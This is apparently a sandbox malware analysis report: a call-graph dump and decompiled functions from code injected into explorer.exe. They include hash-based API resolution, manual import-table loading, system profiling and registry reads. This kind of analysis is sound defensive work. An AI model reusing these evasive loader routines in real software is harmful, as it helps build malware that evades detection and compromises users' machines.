15210->15211 15212 32e7f46 15211->15212 15213 32e88ce strncpy 15212->15213 15214 32e7f5c 15213->15214 15215 32e88ce strncpy 15214->15215 15216 32e7f6d 15215->15216 15217 32e88ce strncpy 15216->15217 15218 32e7f81 15217->15218 15219 32e88ce strncpy 15218->15219 15220 32e7f94 15219->15220 15221 32e88ce strncpy 15220->15221 15222 32e7fa8 15221->15222 15223 32e88ce strncpy 15222->15223 15224 32e7fc7 15223->15224 15225 32e892a 5 API calls 15224->15225 15226 32e7fd8 15225->15226 15227 32e88ce strncpy 15226->15227 15228 32e7fe3 15227->15228 15229 32e892a 5 API calls 15228->15229 15230 32e7ff4 15229->15230 15231 32e88ce strncpy 15230->15231 15232 32e7fff 15231->15232 15233 32e88ce strncpy 15232->15233 15234 32e801b 15233->15234 15235 32f1c51 13 API calls 15234->15235 15236 32e8023 15235->15236 15236->14809 15238 32f1d3e 18 API calls 15237->15238 15239 32e7904 15238->15239 15240 32ea078 memset 15239->15240 15249 32e7910 15239->15249 15241 32e7944 15240->15241 15241->15249 15271 32e8d70 RtlAllocateHeap 15241->15271 15243 32e7a1c 15245 32e8d86 2 API calls 15243->15245 15247 32e7a2d 15243->15247 15244 32e79c8 15244->15243 15246 32e9a1d RtlAllocateHeap 15244->15246 15244->15249 15245->15243 15246->15244 15248 32e8d86 2 API calls 15247->15248 15248->15249 15249->14821 15251 32e77cd 15250->15251 15252 32e785d 15251->15252 15253 32ebfd9 2 API calls 15251->15253 15252->14811 15252->14824 15254 32e77e9 15253->15254 15254->15252 15255 32e7835 15254->15255 15272 32e8d70 RtlAllocateHeap 15254->15272 15258 32e8d86 2 API calls 15255->15258 15257 32e7806 15257->15255 15260 32e9faf 2 API calls 15257->15260 15259 32e7853 15258->15259 15261 32e8d86 2 API calls 15259->15261 15262 32e7825 15260->15262 15261->15252 15273 32e8b62 15262->15273 15289 32e8036 15264->15289 15266 32e7782 15267 32e769f 19 API calls 15266->15267 15268 32e77a2 15267->15268 15269 32e8d86 2 API calls 15268->15269 15270 32e77ad 15269->15270 15270->14811 15271->15244 15272->15257 15276 32e89f6 15273->15276 15283 32e8960 15276->15283 15278 32e8a23 15278->15255 15279 32e8a4f GetLastError 15282 32e8ade 15279->15282 15280 32e8a1c 15280->15278 15280->15279 15280->15282 15281 32e8d86 2 API calls 15281->15278 15282->15281 15288 32e8d70 RtlAllocateHeap 15283->15288 15285 32e8971 15285->15285 15286 32e89c2 lstrlenW 15285->15286 15287 32e89d3 15285->15287 15286->15287 15287->15280 15287->15287 15288->15285 15290 32f11d0 7 API calls 15289->15290 15291 32e8045 15290->15291 15292 32e88ce strncpy 15291->15292 15293 32e805b 15292->15293 15294 32e88ce strncpy 15293->15294 15295 32e806f 15294->15295 15296 32e88ce strncpy 15295->15296 15297 32e8080 15296->15297 15298 32e88ce strncpy 15297->15298 15299 32e8091 15298->15299 15300 32e88ce strncpy 15299->15300 15301 32e80a6 15300->15301 15302 32e88ce strncpy 15301->15302 15303 32e80bc 15302->15303 15304 32e88ce strncpy 15303->15304 15305 32e80d2 15304->15305 15306 32f1c51 13 API calls 15305->15306 15307 32e80da 15306->15307 15307->15266 13602 32e5769 13625 32e9eb5 13602->13625 13606 32e5798 13607 32e9f75 2 API calls 13606->13607 13624 32e586a 13606->13624 13608 32e57b0 13607->13608 13609 32e9faf 2 API calls 13608->13609 13610 32e57c5 13609->13610 13611 32e8d2e 2 API calls 13610->13611 13612 32e57cd 13611->13612 13613 32eb604 CreateFileW 13612->13613 13614 32e57db 13613->13614 13615 32e8d86 2 API calls 13614->13615 13616 32e57e8 13615->13616 13617 32eb798 2 API calls 13616->13617 13621 32e57f6 13617->13621 13618 32ec413 12 API calls 13623 32e5821 13618->13623 13620 32e585f 13622 32e8d86 2 API calls 13620->13622 13621->13623 13631 32eb49b CreateFileW 13621->13631 13622->13624 13623->13618 13623->13620 13626 32e9890 2 API calls 13625->13626 13627 32e9ed6 13626->13627 13628 32e9bf7 2 API calls 13627->13628 13629 32e5781 13628->13629 13629->13624 13630 32e8d70 RtlAllocateHeap 13629->13630 13630->13606 13631->13621 15314 32e3afe 15315 32f3789 2 API calls 15314->15315 15316 32e3b1c 15315->15316 15335 32e8d5b HeapCreate 15316->15335 15318 32e3b22 15319 32e972e RtlAllocateHeap 15318->15319 15320 32e3b27 15319->15320 15321 32e64c2 8 API calls 15320->15321 15322 32e3b32 15321->15322 15323 32ede84 9 API calls 15322->15323 15324 32e3b3d 15323->15324 15336 32e8d70 RtlAllocateHeap 15324->15336 15326 32e3b5f 15327 32e3b79 lstrcpynW 15326->15327 15334 32e3b69 15326->15334 15328 32e3b92 15327->15328 15337 32f3950 15328->15337 15331 32e9faf 2 API calls 15332 32e3c06 GetLastError 15331->15332 15332->15334 15335->15318 15336->15326 15342 32f39a5 15337->15342 15339 32e3bb0 15339->15331 15339->15334 15343 32f3966 15342->15343 15344 32f39fb 15342->15344 15343->15339 15348 32f3de4 15343->15348 15344->15343 15347 32f3a96 15344->15347 15357 32e8d70 RtlAllocateHeap 15344->15357 15346 32e8f0a memset 15346->15347 15347->15343 15347->15346 15355 32f3e15 15348->15355 15349 32f3f41 GetModuleHandleA 15350 32f3f5a LoadLibraryA 15349->15350 15349->15355 15350->15355 15351 32f4032 15352 32f40ac lstrcmpA 15351->15352 15356 32f3f73 15351->15356 15352->15351 15352->15356 15353 32f3fcb GetProcAddress 15353->15355 15354 32f3fb2 GetProcAddress 15354->15355 15355->15349 15355->15351 15355->15353 15355->15354 15355->15356 15356->15339 15357->15347 13889 32e5746 13894 32ee5e3 13889->13894 13892 32e575b GetLastError 13893 32e5764 13892->13893 13921 32e8d70 RtlAllocateHeap 13894->13921 13896 32ee5fa 13897 32e5757 13896->13897 13898 32e9a5a RtlAllocateHeap 13896->13898 13897->13892 13897->13893 13899 32ee60f 13898->13899 13899->13897 13922 32ea608 13899->13922 13902 32e9f8f 2 API calls 13903 32ee62f 13902->13903 13904 32e9fee 2 API calls 13903->13904 13905 32ee644 13904->13905 13906 32e8d41 2 API calls 13905->13906 13907 32ee64d 13906->13907 13930 32ee433 13907->13930 13910 32ee65e 13912 32e8d86 2 API calls 13910->13912 13913 32ee731 13912->13913 13914 32e8d86 2 API calls 13913->13914 13915 32ee73c 13914->13915 13916 32e8d86 2 API calls 13915->13916 13916->13897 13917 32ee66d 13919 32ee6a7 13917->13919 13952 32eb49b CreateFileW 13917->13952 13919->13910 13920 32ee704 lstrlenW 13919->13920 13920->13919 13921->13896 13923 32ea621 13922->13923 13924 32e8e04 3 API calls 13923->13924 13928 32ea721 13923->13928 13929 32ea69c 13923->13929 13924->13929 13925 32ea6f9 13926 32e8f0a memset 13925->13926 13925->13928 13926->13928 13928->13902 13929->13925 13953 32e8e72 13929->13953 13931 32e9f8f 2 API calls 13930->13931 13932 32ee445 13931->13932 13933 32e9eb5 4 API calls 13932->13933 13934 32ee44f 13933->13934 13935 32e8d41 2 API calls 13934->13935 13936 32ee45a 13935->13936 13937 32ee469 13936->13937 13957 32ee413 13936->13957 13937->13910 13939 32ee477 13937->13939 13940 32e9bf7 2 API calls 13939->13940 13941 32ee490 CoInitializeEx 13940->13941 13942 32e9f8f 2 API calls 13941->13942 13943 32ee4ab 13942->13943 13944 32e9f8f 2 API calls 13943->13944 13945 32ee4bc 13944->13945 13946 32e8d41 2 API calls 13945->13946 13947 32ee4d8 13946->13947 13948 32e8d41 2 API calls 13947->13948 13949 32ee4ee 13948->13949 13950 32e8d86 2 API calls 13949->13950 13951 32ee4f9 13950->13951 13951->13917 13952->13917 13954 32e8e9e lstrlenW 13953->13954 13956 32e8ed2 13954->13956 13956->13929 13956->13956 13958 32ee41b 13957->13958 13959 32eb604 CreateFileW 13958->13959 13960 32ee425 13959->13960 13960->13937 13961 32e2845 13962 32e285c 13961->13962 13963 32e2938 13961->13963 13964 32ebfd9 2 API calls 13962->13964 13965 32e9dc9 2 API calls 13963->13965 13966 32e2868 13964->13966 13967 32e2944 13965->13967 13966->13963 13991 32e9f1e 13966->13991 13970 32e8d86 2 API calls 13970->13963 13971 32e9acd 2 API calls 13972 32e288c 13971->13972 13995 32ebf67 13972->13995 13974 32e2911 13977 32e8d86 2 API calls 13974->13977 13975 32e289f 13975->13974 13976 32e9acd 2 API calls 13975->13976 13978 32e28ab 13976->13978 13979 32e291f 13977->13979 13980 32e109a 2 API calls 13978->13980 13981 32e8d86 2 API calls 13979->13981 13982 32e28b4 13980->13982 13983 32e292a 13981->13983 13984 32e9bf7 2 API calls 13982->13984 13983->13970 13985 32e28c5 13984->13985 13986 32e8d41 2 API calls 13985->13986 13987 32e28d3 13986->13987 13987->13974 13988 32eb798 2 API calls 13987->13988 13989 32e28f1 13988->13989 13990 32e8d86 2 API calls 13989->13990 13990->13974 13992 32e9f27 13991->13992 13994 32e287a 13991->13994 13998 32e8d70 RtlAllocateHeap 13992->13998 13994->13971 13994->13983 13999 32e8d70 RtlAllocateHeap 13995->13999 13997 32ebf8c 13997->13975 13998->13994 13999->13997 14038 32efc56 14041 32e8d70 RtlAllocateHeap 14038->14041 14040 32efc66 14041->14040

                                                                                                            Executed Functions

                                                                                                            Function 032EEFB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 30 32eefb8-32eefcf 31 32ef02c 30->31 32 32eefd1-32eeff9 30->32 34 32ef02e-32ef032 31->34 32->31 33 32eeffb-32ef01e call 32ea5da call 32ee3c8 32->33 39 32ef033-32ef04a 33->39 40 32ef020-32ef02a 33->40 41 32ef04c-32ef054 39->41 42 32ef0a0-32ef0a2 39->42 40->31 40->33 41->42 43 32ef056 41->43 42->34 44 32ef058-32ef05e 43->44 45 32ef06e-32ef07f 44->45 46 32ef060-32ef062 44->46 48 32ef084-32ef090 LoadLibraryA 45->48 49 32ef081-32ef082 45->49 46->45 47 32ef064-32ef06c 46->47 47->44 47->45 48->31 50 32ef092-32ef09c GetProcAddress 48->50 49->48 50->31 51 32ef09e 50->51 51->34
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032EEFB8(void* __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v92;
				intOrPtr _t41;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				void* _t56;
				struct HINSTANCE__* _t58;
				_Unknown_base(*)()* _t59;
				intOrPtr _t60;
				void* _t62;
				intOrPtr _t63;
				void* _t69;
				char _t70;
				void* _t75;
				CHAR* _t80;
				void* _t82;

				_t75 = __ecx;
				_v12 = __edx;
				_t60 =  *((intOrPtr*)(__ecx + 0x3c));
				_t41 =  *((intOrPtr*)(_t60 + __ecx + 0x78));
				if(_t41 == 0) {
					L4:
					return 0;
				}
				_t62 = _t41 + __ecx;
				_v24 =  *((intOrPtr*)(_t62 + 0x24)) + __ecx;
				_t73 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_t63 =  *((intOrPtr*)(_t62 + 0x18));
				_v28 =  *((intOrPtr*)(_t62 + 0x1c)) + __ecx;
				_t47 = 0;
				_v20 =  *((intOrPtr*)(_t62 + 0x20)) + __ecx;
				_v8 = 0;
				_v16 = _t63;
				if(_t63 == 0) {
					goto L4;
				} else {
					goto L2;
				}
				while(1) {
					L2:
					_t49 = E032EE3C8( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75, E032EA5DA( *((intOrPtr*)(_t73 + _t47 * 4)) + _t75), 0);
					_t51 = _v8;
					if((_t49 ^ 0x218fe95b) == _v12) {
						break;
					}
					_t73 = _v20;
					_t47 = _t51 + 1;
					_v8 = _t47;
					if(_t47 < _v16) {
						continue;
					}
					goto L4;
				}
				_t69 =  *((intOrPtr*)(_t60 + _t75 + 0x78)) + _t75;
				_t80 =  *((intOrPtr*)(_v28 + ( *(_v24 + _t51 * 2) & 0x0000ffff) * 4)) + _t75;
				if(_t80 < _t69 || _t80 >=  *((intOrPtr*)(_t60 + _t75 + 0x7c)) + _t69) {
					return _t80;
				} else {
					_t56 = 0;
					while(1) {
						_t70 = _t80[_t56];
						if(_t70 == 0x2e || _t70 == 0) {
							break;
						}
						 *((char*)(_t82 + _t56 - 0x58)) = _t70;
						_t56 = _t56 + 1;
						if(_t56 < 0x40) {
							continue;
						}
						break;
					}
					 *((intOrPtr*)(_t82 + _t56 - 0x58)) = 0x6c6c642e;
					 *((char*)(_t82 + _t56 - 0x54)) = 0;
					if( *((char*)(_t56 + _t80)) != 0) {
						_t80 =  &(( &(_t80[1]))[_t56]);
					}
					_t40 =  &_v92; // 0x6c6c642e
					_t58 = LoadLibraryA(_t40); // executed
					if(_t58 == 0) {
						goto L4;
					}
					_t59 = GetProcAddress(_t58, _t80);
					if(_t59 == 0) {
						goto L4;
					}
					return _t59;
				}
			}

























                                                                                                            0x032eefc1
                                                                                                            0x032eefc3
                                                                                                            0x032eefc6
                                                                                                            0x032eefc9
                                                                                                            0x032eefcf
                                                                                                            0x032ef02c
                                                                                                            0x00000000
                                                                                                            0x032ef02c
                                                                                                            0x032eefd1
                                                                                                            0x032eefdc
                                                                                                            0x032eefdf
                                                                                                            0x032eefe4
                                                                                                            0x032eefe9
                                                                                                            0x032eefec
                                                                                                            0x032eefee
                                                                                                            0x032eeff1
                                                                                                            0x032eeff4
                                                                                                            0x032eeff9
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eeffb
                                                                                                            0x032eeffb
                                                                                                            0x032ef00d
                                                                                                            0x032ef01a
                                                                                                            0x032ef01e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ef020
                                                                                                            0x032ef023
                                                                                                            0x032ef024
                                                                                                            0x032ef02a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ef02a
                                                                                                            0x032ef041
                                                                                                            0x032ef046
                                                                                                            0x032ef04a
                                                                                                            0x00000000
                                                                                                            0x032ef056
                                                                                                            0x032ef056
                                                                                                            0x032ef058
                                                                                                            0x032ef058
                                                                                                            0x032ef05e
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ef064
                                                                                                            0x032ef068
                                                                                                            0x032ef06c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ef06c
                                                                                                            0x032ef072
                                                                                                            0x032ef07a
                                                                                                            0x032ef07f
                                                                                                            0x032ef082
                                                                                                            0x032ef082
                                                                                                            0x032ef084
                                                                                                            0x032ef088
                                                                                                            0x032ef090
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ef094
                                                                                                            0x032ef09c
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ef09c

                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNELBASE(.dll,?,00000138,00000000), ref: 032EF088
                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 032EF094
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
                                                                                                            • String ID: .dll
                                                                                                            • API String ID: 2574300362-2738580789
                                                                                                            • Opcode ID: a1f2e06acab93992290e730debf9686f803fa0d758b23185afdf7f693ec12342
                                                                                                            • Instruction ID: 9e8aa46eb4a13a21aee85f2e28eaaf4b971f000d800521774249781c80af5085
                                                                                                            • Opcode Fuzzy Hash: a1f2e06acab93992290e730debf9686f803fa0d758b23185afdf7f693ec12342
                                                                                                            • Instruction Fuzzy Hash: 85313431A1021AAFDB24CF6DC981BAEFBF5AF44205F694069D805D7309DB70D9C1CBA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EDE84 Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032EDE84(void* __ecx) {
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				void* _t28;
				void* _t32;
				struct _OSVERSIONINFOA* _t33;

				_t12 =  *0x32ff8e0; // 0x52ef6c8
				_t33 =  *0x32ff8e4; // 0x3310000
				_t14 = E032ECA1B( *((intOrPtr*)(_t12 + 0x12c))(_t28, _t32, __ecx)); // executed
				 *((intOrPtr*)(_t33 + 0x110)) = _t14;
				_t3 = _t33 + 0x1644; // 0x3311644
				_t29 = _t3;
				_t15 =  *0x32ff8e0; // 0x52ef6c8
				_t16 =  *((intOrPtr*)(_t15 + 0x128))(0, _t3, 0x105);
				_t37 = _t16;
				if(_t16 != 0) {
					_t16 = E032E9790(_t29, _t37);
				}
				_t5 = _t33 + 0x228; // 0x3310228
				 *((intOrPtr*)(_t33 + 0x1854)) = _t16;
				 *((intOrPtr*)(_t33 + 0x434)) = E032E9790(_t5, _t37);
				E032E8F0A(_t33, 0, 0x9c);
				_t33->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t33);
				 *((intOrPtr*)(_t33 + 0x1640)) = GetCurrentProcessId();
				_t21 = E032EF3E5(_t5);
				_t9 = _t33 + 0x220; // 0x3310220
				 *((intOrPtr*)(_t33 + 0x21c)) = _t21;
				_t22 = E032EF420(_t9); // executed
				 *((intOrPtr*)(_t33 + 0x218)) = _t22;
				return _t22;
			}












                                                                                                            0x032ede88
                                                                                                            0x032ede8e
                                                                                                            0x032ede9d
                                                                                                            0x032edea7
                                                                                                            0x032edead
                                                                                                            0x032edead
                                                                                                            0x032edeb3
                                                                                                            0x032edebb
                                                                                                            0x032edec1
                                                                                                            0x032edec3
                                                                                                            0x032edec7
                                                                                                            0x032edec7
                                                                                                            0x032edecc
                                                                                                            0x032eded2
                                                                                                            0x032edee2
                                                                                                            0x032edeec
                                                                                                            0x032edef4
                                                                                                            0x032edef7
                                                                                                            0x032edf03
                                                                                                            0x032edf09
                                                                                                            0x032edf0e
                                                                                                            0x032edf14
                                                                                                            0x032edf1a
                                                                                                            0x032edf20
                                                                                                            0x032edf28

                                                                                                            APIs
                                                                                                            • GetVersionExA.KERNEL32(03310000,03310000,?,032E3B3D), ref: 032EDEF7
                                                                                                            • GetCurrentProcessId.KERNEL32(?,032E3B3D), ref: 032EDEFD
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CurrentProcessVersion
                                                                                                            • String ID:
                                                                                                            • API String ID: 2809935031-0
                                                                                                            • Opcode ID: 9ee5767bd5e3d2584a6c0fdb7be0bc7da6b6670cbba2d0d00c2851514aae6fa4
                                                                                                            • Instruction ID: 7fad557daab6f19c7096a03a604ccfbe91a56d6587a0f7af8089550a821c574f
                                                                                                            • Opcode Fuzzy Hash: 9ee5767bd5e3d2584a6c0fdb7be0bc7da6b6670cbba2d0d00c2851514aae6fa4
                                                                                                            • Instruction Fuzzy Hash: 020140B5510700AFC710FF70A94EFDA77E9EF98310F49482EE55A8B240EBB46580CB94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032F3789 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151libraryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 50%
                                                                                                            			E032F3789(signed int __eax, void* __ecx, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;
				void* _t167;

				_t167 = __ecx;
				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E032EF0A4(_t167, _v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}
























                                                                                                            0x032f3789
                                                                                                            0x032f378f
                                                                                                            0x032f3797
                                                                                                            0x032f37ac
                                                                                                            0x032f37be
                                                                                                            0x032f37ca
                                                                                                            0x032f37d0
                                                                                                            0x032f37d5
                                                                                                            0x032f37e1
                                                                                                            0x032f394c
                                                                                                            0x00000000
                                                                                                            0x032f394c
                                                                                                            0x032f37e7
                                                                                                            0x032f37f0
                                                                                                            0x032f37fe
                                                                                                            0x032f3801
                                                                                                            0x032f3810
                                                                                                            0x032f3810
                                                                                                            0x032f3817
                                                                                                            0x032f3825
                                                                                                            0x032f3828
                                                                                                            0x032f383f
                                                                                                            0x032f3845
                                                                                                            0x032f384c
                                                                                                            0x032f385c
                                                                                                            0x032f3874
                                                                                                            0x032f385e
                                                                                                            0x032f3866
                                                                                                            0x032f3866
                                                                                                            0x032f3877
                                                                                                            0x032f387b
                                                                                                            0x032f3887
                                                                                                            0x032f388b
                                                                                                            0x032f388f
                                                                                                            0x032f3893
                                                                                                            0x032f389f
                                                                                                            0x032f38ca
                                                                                                            0x032f38d2
                                                                                                            0x032f38e4
                                                                                                            0x032f38f0
                                                                                                            0x032f38a1
                                                                                                            0x032f38a6
                                                                                                            0x032f38b1
                                                                                                            0x032f38bd
                                                                                                            0x032f38bd
                                                                                                            0x032f38f9
                                                                                                            0x032f38ff
                                                                                                            0x032f3909
                                                                                                            0x032f3925
                                                                                                            0x032f390b
                                                                                                            0x032f391a
                                                                                                            0x032f391a
                                                                                                            0x032f3909
                                                                                                            0x032f392d
                                                                                                            0x032f3936
                                                                                                            0x032f3936
                                                                                                            0x032f3944
                                                                                                            0x00000000
                                                                                                            0x032f3944
                                                                                                            0x032f3850
                                                                                                            0x00000000
                                                                                                            0x032f3850
                                                                                                            0x00000000
                                                                                                            0x032f3828
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 032F37A6
                                                                                                            • LoadLibraryA.KERNELBASE(00000000), ref: 032F383F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HandleLibraryLoadModule
                                                                                                            • String ID: GetProcAddress$kernel32.dll
                                                                                                            • API String ID: 4133054770-1584408056
                                                                                                            • Opcode ID: 504d28aa68d0e62a15030bcb8c23ec08a94f9491d75aab84559942eaecfa6d0e
                                                                                                            • Instruction ID: 65408660a4a6c4c3ef0c60ba2841a91786c426758993eae988b7c7e23d9f00b4
                                                                                                            • Opcode Fuzzy Hash: 504d28aa68d0e62a15030bcb8c23ec08a94f9491d75aab84559942eaecfa6d0e
                                                                                                            • Instruction Fuzzy Hash: 49617F79D10209EFDB00CF98D585BADBBB1FF08325F2485A9EA15AB351C374AA80CF54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EA7D0 Relevance: 4.8, APIs: 3, Instructions: 251registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E032EA7D0(char __ecx, int __edx, void* __fp0, intOrPtr _a4, int* _a8, intOrPtr* _a12) {
				void* _v8;
				int _v12;
				void* _v16;
				void* _v20;
				int _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v40;
				int _v44;
				char _v108;
				int _t85;
				char _t89;
				void* _t90;
				char* _t91;
				intOrPtr* _t96;
				void* _t107;
				int* _t115;
				intOrPtr _t118;
				char* _t121;
				intOrPtr _t122;
				intOrPtr _t124;
				intOrPtr _t127;
				char _t129;
				intOrPtr _t130;
				intOrPtr _t132;
				char* _t135;
				int _t139;
				int _t143;
				intOrPtr _t144;
				intOrPtr* _t150;
				int _t151;
				char _t157;
				int _t159;
				intOrPtr _t160;
				intOrPtr _t167;
				int _t172;
				char* _t173;
				char* _t174;
				char _t175;
				void* _t176;
				void* _t177;
				void* _t179;

				_t172 = 0;
				_v24 = __edx;
				_t173 = 0;
				_v32 = __ecx;
				_v28 = 0;
				_v8 = 0x80000001;
				_v20 = 0;
				_t85 = E032E8D70(0x110);
				_t151 = _t85;
				_v44 = _t151;
				_t180 = _t151;
				if(_t151 == 0) {
					return _t85;
				}
				_t154 = _a4;
				 *((intOrPtr*)(_t151 + 0x108)) = _a4;
				E032EC5D7(_a4, __edx, _t180, __fp0, _t154,  &_v108);
				_t157 = _v108;
				_t89 = _t157;
				if(_t157 - 0x61 <= 0x19) {
					_t89 = _t89 - 0x20;
				}
				_v108 = _t89;
				_t90 = E032E9F75(0x33d);
				_t159 = _v24;
				_v16 = _t90;
				if(_t159 == 0) {
					L15:
					_t160 =  *0x32ff8e4; // 0x3310000
					__eflags =  *((intOrPtr*)(_t160 + 0x214)) - 3;
					if( *((intOrPtr*)(_t160 + 0x214)) != 3) {
						_push(_t172);
						_push( &_v108);
						_push("\\");
						_t91 = E032E9BA4(_t90);
						_t177 = _t177 + 0x10;
						L19:
						_t173 = _t91;
						_v20 = _t173;
						goto L20;
					}
					_v24 = _t172;
					_v8 = 0x80000003;
					_t118 =  *0x32ff8e8; // 0x52ef8b8
					 *((intOrPtr*)(_t118 + 0x20))( *((intOrPtr*)( *((intOrPtr*)(_t160 + 0x110)))),  &_v24);
					__eflags = _v24 - _t173;
					if(_v24 == _t173) {
						goto L20;
					}
					_push(_t172);
					_push( &_v108);
					_t121 = "\\";
					_push(_t121);
					_push(_v16);
					_push(_t121);
					_t91 = E032E9BA4(_v24);
					_t177 = _t177 + 0x18;
					goto L19;
				} else {
					_t122 =  *0x32ff8e4; // 0x3310000
					_push( *((intOrPtr*)( *((intOrPtr*)(_t122 + 0x110)))));
					_t124 =  *0x32ff8e8; // 0x52ef8b8
					_push(_t159);
					if( *((intOrPtr*)(_t124 + 0x68))() != 0) {
						_t90 = _v16;
						goto L15;
					}
					_v12 = _t172;
					_t127 =  *0x32ff8e8; // 0x52ef8b8
					_v8 = 0x80000003;
					 *((intOrPtr*)(_t127 + 0x20))(_v24,  &_v12);
					if(_v12 == _t173) {
						L20:
						E032E8D2E( &_v16);
						if(RegOpenKeyExA(_v8, _t173, _t172, 0x20019,  &_v28) == 0) {
							_t96 = _a8;
							__eflags = _t96;
							if(_t96 != 0) {
								 *_t96 = 1;
							}
							RegCloseKey(_v28);
							L28:
							if(_t173 == 0) {
								L32:
								E032E8D86( &_v44, 0x110);
								E032E8F0A( &_v108, _t172, 0x40);
								_t151 = _t172;
								L33:
								E032E8D86( &_v20, 0xffffffff);
								return _t151;
							}
							 *((intOrPtr*)(_t151 + 0x10c)) = _v8;
							_t107 = E032EA5DA(_t173);
							 *_t151 = _t107;
							if(_t107 == 0) {
								goto L33;
							} else {
								goto L30;
							}
